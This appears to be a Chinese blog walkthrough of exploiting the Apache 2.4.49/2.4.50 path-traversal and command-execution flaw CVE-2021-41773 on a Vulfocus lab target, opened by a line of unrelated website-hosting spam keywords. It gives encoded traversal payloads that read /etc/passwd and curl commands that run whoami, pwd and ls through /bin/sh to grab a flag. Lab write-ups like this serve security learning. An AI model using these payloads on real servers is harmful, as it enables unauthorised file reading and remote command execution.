做网站虚拟主机多少钱,新乡做网站优化,厦门建站方案,个体工商户 网站建设本文仅作为学习参考使用#xff0c;本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
前言:
本文主要讲解apache命令执行漏洞#xff08;cve_2021_41773#xff09;。
靶场链接#xff1a;Vulfocus 漏洞威胁分析平台
一#xff0c;漏洞简介。 cve_2021_41773漏洞…本文仅作为学习参考使用本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
前言:
本文主要讲解apache命令执行漏洞cve_2021_41773。
靶场链接Vulfocus 漏洞威胁分析平台
一漏洞简介。 cve_2021_41773漏洞是一个目录穿越的高危漏洞主要影响版本有Apache阿帕奇 2.4.49 和 Apache 2.4.50其对路径规范化所做的更改中存在一个路径穿越漏洞攻击者可利用该漏洞读取到Web目录外的其他文件如系统配置文件、网站源码等甚至在特定情况下攻击者可构造恶意请求执行命令控制服务器。
二poc。
具体poc已给出
get传参方式poc为
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd可以看到是一段经过了url编码的内容解密后为 2post传参
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
经过两次url解码后结果为 三漏洞利用。
打开靶场连接后可以发现是一个阿帕奇服务的默认界面。 通过抓包后发现传参方式为get 此处使用get传参的poc。
进行攻击测试poc填写到红框内 可以看到回显为修改请求头所读的敏感信息。
此处为什么要用burp因为浏览器自动对路径进行了一次url解码用burp发送过去的请求不会被自动解码
四rce。
1查看敏感文件。
在kali上使用curl 命令进⾏进一步渗透工作。
读取敏感文件的命令为 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
① [ip] 替换成被攻击服务器的 IP。
② port 替换为被攻击服务器端⼝。
curl简介Linux命令行工具curl详解与服务器之间传输数据_curl socks5代理-CSDN博客
2通用操作。
具体格式为 curl --data echo;shell http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 替换shell为想要执行的命令。
取得敏感信息查询一下当前用户 curl --data echo;whoami http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 查看一下当前目录 curl --data echo;pwd http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 获取flag
curl --data echo;ls /tmp http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh